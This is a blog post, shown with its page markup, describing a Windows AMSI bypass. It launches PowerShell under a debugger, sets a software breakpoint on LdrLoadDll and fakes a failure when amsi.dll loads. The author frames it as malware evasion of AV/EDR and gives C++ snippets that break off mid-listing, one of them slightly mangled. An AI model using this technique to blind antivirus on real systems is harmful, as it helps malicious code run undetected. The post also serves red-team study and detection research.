<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="AMSI Evasion - Runtime DLL Load Interception" />
<meta property="og:locale" content="en" />
<meta name="description" content="Zero-Patch &amp; Advanced AMSI bypass technique" />
<meta property="og:description" content="Zero-Patch &amp; Advanced AMSI bypass technique" />
<link rel="canonical" href="https://3lkr.github.io/posts/AMSI/" />
<meta property="og:url" content="https://3lkr.github.io/posts/AMSI/" />
<meta property="og:site_name" content="3lkr" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-10-26T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="AMSI Evasion - Runtime DLL Load Interception" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-10-26T00:00:00+02:00","datePublished":"2025-10-26T00:00:00+02:00","description":"Zero-Patch &amp; Advanced AMSI bypass technique","headline":"AMSI Evasion - Runtime DLL Load Interception","mainEntityOfPage":{"@type":"WebPage","@id":"https://3lkr.github.io/posts/AMSI/"},"url":"https://3lkr.github.io/posts/AMSI/"}</script>
<!-- End Jekyll SEO tag -->


  <title>AMSI Evasion - Runtime DLL Load Interception | 3lkr
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="icon" type="image/png" href="/assets/img/favicons/favicon-96x96.png" sizes="96x96">
<link rel="icon" type="image/svg+xml" href="/assets/img/favicons/favicon.svg">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">



  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.1.0/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.36.4/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.18/dayjs.min.js,npm/dayjs@1.11.18/locale/en.js,npm/dayjs@1.11.18/plugin/relativeTime.js,npm/dayjs@1.11.18/plugin/localizedFormat.js,npm/tocbot@4.36.4/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/avatar.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">3lkr</a>
    <p class="site-subtitle fst-italic mb-0">Offensive Security Enthusiast | Pentester</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    

      
        <a
          href="https://github.com/3lkr"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
          
      

      
        <a
          href="https://linkedin.com/in/oamouddene"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>AMSI Evasion - Runtime DLL Load Interception</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>AMSI Evasion - Runtime DLL Load Interception</h1>
    
      <p class="post-desc fw-light mb-4">Zero-Patch & Advanced AMSI bypass technique</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1761429600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Oct 26, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/OssamaN7">AIT-EL MOUDDENE Ossama</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1201 words"
>
  <em>6 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">AMSI Evasion - Runtime DLL Load Interception</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">AMSI Evasion - Runtime DLL Load Interception</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="introduction"><span class="me-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>While exploring the .NET CLR, I’ve always been fascinated by the process of loading assemblies mapping entry points, inspecting methods and classes, and manipulating the loading context itself. In my journey in malware development, I used to craft heavily obfuscated and packed C# payloads. Statically, they evaded detection with ease no suspicious API calls, clean imports. But the moment they executed, <strong>AVs and EDRs lit up . That’s when I dove deep into runtime defense mechanisms a vast and brutal landscape. Today, I’m focusing on: AMSI (Antimalware Scan Interface)</strong>.</p>

<h2 id="what-is-amsi"><span class="me-2">What is AMSI</span><a href="#what-is-amsi" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>AMSI <a href="https://learn.microsoft.com/fr-fr/windows/win32/amsi/antimalware-scan-interface-portal]">Antimalware Scan Interface</a> is a Windows interface that allows applications (like PowerShell, WMI, JScript, VBScript, and the .NET runtime) to submit memory buffers such as scripts, in-memory assemblies, or dynamically compiled code to registered antivirus engines for scanning <strong>before execution</strong>. It operates at the <strong>user-mode API level</strong> via <code class="language-plaintext highlighter-rouge">AmsiScanBuffer()</code>, enabling real-time malware detection regardless of the source (file, stream, or memory).</p>

<p>So loading an assembly is not that easy anymore :D because <code class="language-plaintext highlighter-rouge">PowerShell.Invoke()</code>, <code class="language-plaintext highlighter-rouge">.NET Assembly.Load(byte[])</code>, <code class="language-plaintext highlighter-rouge">Add-Type</code>, trigger AMSI, and spawn <code class="language-plaintext highlighter-rouge">amsi.dll</code> directly in your process :).</p>

<p>Well, bypassing it is easy and not easy at the same time. Regardless of many techniques in the Red Team area, the EDRs and Detection systems are too fast to enhance their defenses and stay ahead of these techniques.</p>

<p><a href="/assets/img/posts/amsi.jpg" class="popup img-link shimmer"><img src="/assets/img/posts/amsi.jpg" alt="Logo" loading="lazy"></a></p>

<h2 id="the-problem-with-traditional-amsi-patching"><span class="me-2">The Problem with Traditional AMSI Patching</span><a href="#the-problem-with-traditional-amsi-patching" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>A famous technique for bypassing AMSI is to patch it (locate <code class="language-plaintext highlighter-rouge">AmsiScanBuffer()</code> in the process address space and patch the return address so we can skip the jmp to <code class="language-plaintext highlighter-rouge">AmsiScanBuffer()</code>, or patch its arguments, so we can give it a null byte instead of our “Malicious Code”). But it’s very detected because of the suspicious sequence of the API calls used: <code class="language-plaintext highlighter-rouge">VirtualProtect</code>, <code class="language-plaintext highlighter-rouge">WriteProcessMemory</code>, <code class="language-plaintext highlighter-rouge">GetProcAddress("AmsiScanBuffer")</code> also the YARA rules match known patterns like <code class="language-plaintext highlighter-rouge">48 31 C0 C3 (xor rax,rax; ret)</code>.</p>

<p><a href="/assets/img/posts/amsiscanbuffer.png" class="popup img-link shimmer"><img src="/assets/img/posts/amsiscanbuffer.png" alt="Logo" loading="lazy"></a></p>

<p>So I was searching for a method to “kill” the amsi.dll, or in other terms, not let it attach to my process; I found an article and a technique called BlindSide: <a href="https://cymulate.com/blog/blindside-a-new-technique-for-edr-evasion-with-hardware-breakpoints/">BlindSide Documentation</a>, it was what I was looking for!!</p>

<h2 id="blindside-technique"><span class="me-2">BlindSide Technique</span><a href="#blindside-technique" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Blindside sets a hardware breakpoint (DR0) on LdrLoadDll in a debugged child process, blocks all DLL loads after <code class="language-plaintext highlighter-rouge">ntdll.dll</code>, then copies the unhooked .text section into the target process to unhook EDR-instrumented syscalls.</p>

<h2 id="problems-in-blindside-hwbp"><span class="me-2">Problems in BlindSide (HWBP)</span><a href="#problems-in-blindside-hwbp" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Touching the debug registers is very flagged by EDRs and it’s well recorded by ETW. 
As we can see in <code class="language-plaintext highlighter-rouge">NtSetContextThread()</code> code disassembled:
<code class="language-plaintext highlighter-rouge">EtwWrite</code> function traces the usage of <code class="language-plaintext highlighter-rouge">NtSetContextThread</code>; (Source: Crowdstrike Investigations)</p>

<p><a href="/assets/img/posts/Etwi.png" class="popup img-link shimmer"><img src="/assets/img/posts/Etwi.png" alt="Logo" loading="lazy"></a></p>

<ul>
  <li>Blindside lets <code class="language-plaintext highlighter-rouge">amsi.dll</code> load, then unhooks ntdll (overkill), which can be flagged by the same YARA rules of patching…</li>
  <li>and putting LdrLoadDll, or AmsiScanBuffer Address in Debug register is very flagged, because it is easy to be consulted by EDR.</li>
</ul>

<p><a href="/assets/img/posts/debug_register.png" class="popup img-link shimmer"><img src="/assets/img/posts/debug_register.png" alt="Logo" loading="lazy"></a></p>

<h2 id="enhanced-method"><span class="me-2"><strong>Enhanced Method</strong></span><a href="#enhanced-method" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>So I tried to fix those in my technique by:</p>

<ul>
  <li>Stop <code class="language-plaintext highlighter-rouge">amsi.dll</code> <em>before</em> it loads  using a software breakpoint (<code class="language-plaintext highlighter-rouge">0xCC</code>) <a href="https://www.ollydbg.de/Help/i_Breakpoints.htm">Documentation</a></li>
  <li>No debug registers (DR0–DR7) → zero <code class="language-plaintext highlighter-rouge">SetThreadContext(CONTEXT_DEBUG_REGISTERS)</code></li>
  <li>No dummy process → direct debugging of target via `DEBUG_PROCESS</li>
  <li>No <code class="language-plaintext highlighter-rouge">.text</code> unhooking → no memory copy, no <code class="language-plaintext highlighter-rouge">PAGE_EXECUTE_READWRITE</code></li>
  <li>ASLR-safe offset matching → <code class="language-plaintext highlighter-rouge">LdrLoadDll</code> located using local <code class="language-plaintext highlighter-rouge">ntdll.dll</code> (That’s was a real problem in blindside, not sure about hardcoded offset in the code, who knows what ASLR will lead to)</li>
  <li>Trap Flag (TF) re-arms <code class="language-plaintext highlighter-rouge">0xCC</code> → self-healing hook - 1-byte touch → minimal footprint, restored on non-target loads</li>
</ul>

<h2 id="how-ldrloaddll-works-"><span class="me-2">How LdrLoadDll works ?</span><a href="#how-ldrloaddll-works-" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p><strong>How It Works (x64 Calling Convention)</strong></p>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="n">NTSTATUS</span> <span class="nf">LdrLoadDll</span><span class="p">(</span>
    <span class="n">PWCHAR</span>         <span class="n">PathToFile</span><span class="p">,</span>      <span class="c1">// RCX (optional search path)</span>
    <span class="n">ULONG</span>          <span class="n">Flags</span><span class="p">,</span>           <span class="c1">// RDX</span>
    <span class="n">PUNICODE_STRING</span> <span class="n">ModuleFileName</span><span class="p">,</span> <span class="c1">// R8   DLL name (e.g., L"amsi.dll" in our case)</span>
    <span class="n">PHANDLE</span>        <span class="n">ModuleHandle</span>     <span class="c1">// R9   Output: base address</span>
<span class="p">);</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Called by LoadLibrary, CLR, PowerShell, etc.</p>
<ul>
  <li>Resolves path ==&gt; maps DLL ==&gt; runs DllMain.</li>
  <li><strong>If this fails ==&gt; DLL never loads.</strong></li>
</ul>

<h3 id="2-exploitation-strategy"><span class="me-2">2) Exploitation Strategy</span><a href="#2-exploitation-strategy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><strong>Step-by-Step Process:</strong></p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Step</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>1</td>
      <td>Launch target (e.g., powershell.exe) under DEBUG_PROCESS</td>
    </tr>
    <tr>
      <td>2</td>
      <td>Wait for ntdll.dll to load → locate LdrLoadDll via offset matching</td>
    </tr>
    <tr>
      <td>3</td>
      <td>Inject 0xCC (INT3) at LdrLoadDll entry → triggers EXCEPTION_BREAKPOINT</td>
    </tr>
    <tr>
      <td>4</td>
      <td>On trap:  <br />→ Read R8 → remote UNICODE_STRING  <br />→ Read actual string → “amsi.dll”?  <br />→ <strong>Yes</strong> →  <br />   - Write 0 to *ModuleHandle (R9)  <br />   - Set RAX = STATUS_DLL_NOT_FOUND  <br />   - Jump to return address  <br />→ <strong>No</strong> → single-step to restore 0xCC</td>
    </tr>
    <tr>
      <td>5</td>
      <td>Result: LdrLoadDll returns failure = amsi.dll never maps.</td>
    </tr>
  </tbody>
</table></div>

<p>So the main idea is to turn LdrLoadDll into a firewall xD :D.</p>

<p>Let’s code our idea :)</p>
<h2 id="implementation-details"><span class="me-2">Implementation Details</span><a href="#implementation-details" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><strong>1) Remote Memory R/W — Read/WriteProcessMemory + FlushInstructionCache for stealthy cross-process access.</strong></p>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>   <span class="k">static</span> <span class="kt">int</span> <span class="nf">read_target_memory</span><span class="p">(</span><span class="n">LPCVOID</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">SIZE_T</span> <span class="n">read</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ReadProcessMemory</span><span class="p">(</span><span class="n">g_process_handle</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">read</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">read</span> <span class="o">==</span> <span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="k">static</span> <span class="kt">int</span> <span class="nf">write_target_memory</span><span class="p">(</span><span class="n">LPVOID</span> <span class="n">addr</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">SIZE_T</span> <span class="n">written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">g_process_handle</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">written</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
           <span class="n">written</span> <span class="o">==</span> <span class="n">size</span> <span class="o">&amp;&amp;</span>
           <span class="n">FlushInstructionCache</span><span class="p">(</span><span class="n">g_process_handle</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>2)  1 BYTE MODIFICATION in LdrLoadDll :</strong></p>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>   <span class="k">static</span> <span class="kt">int</span> <span class="nf">install_interception_point</span><span class="p">(</span><span class="n">LPVOID</span> <span class="n">func_addr</span><span class="p">,</span> <span class="n">BYTE</span> <span class="o">*</span><span class="n">backup</span><span class="p">)</span> <span class="p">{</span> <span class="n">BYTE</span> <span class="n">current</span><span class="p">;</span> <span class="n">BYTE</span> <span class="n">int3</span> <span class="o">=</span> <span class="mh">0xCC</span><span class="p">;</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">read_target_memory</span><span class="p">(</span><span class="n">func_addr</span><span class="p">,</span> <span class="err">¤</span><span class="n">t</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="n">backup</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span> <span class="k">return</span> <span class="n">modify_executable_memory</span><span class="p">(</span><span class="n">func_addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">int3</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span> <span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p><strong>3) If amsi.dll detected = Error and jmp :</strong></p>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="k">if</span> <span class="p">(</span><span class="n">check_for_specific_module</span><span class="p">(</span><span class="n">module_name_buffer</span><span class="p">))</span> <span class="p">{</span>
    <span class="c1">// Null out ModuleHandle (R9)</span>
    <span class="n">ULONGLONG</span> <span class="n">null_handle</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">write_target_memory</span><span class="p">((</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">thread_context</span><span class="p">.</span><span class="n">R9</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">null_handle</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>

    <span class="c1">// Force failure</span>
    <span class="n">thread_context</span><span class="p">.</span><span class="n">Rax</span> <span class="o">=</span> <span class="n">STATUS_DLL_NOT_FOUND</span><span class="p">;</span>  <span class="c1">// 0xC0000135</span>

    <span class="c1">// Jump to return address (bypass function body)</span>
    <span class="n">ULONGLONG</span> <span class="n">ret_addr</span><span class="p">;</span>
    <span class="n">read_target_memory</span><span class="p">((</span><span class="n">LPCVOID</span><span class="p">)</span><span class="n">thread_context</span><span class="p">.</span><span class="n">Rsp</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ret_addr</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
    <span class="n">thread_context</span><span class="p">.</span><span class="n">Rsp</span> <span class="o">+=</span> <span class="mi">8</span><span class="p">;</span>
    <span class="n">thread_context</span><span class="p">.</span><span class="n">Rip</span> <span class="o">=</span> <span class="n">ret_addr</span><span class="p">;</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>4) Single-Step Re-arming (Trap Flag)</strong></p>
<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
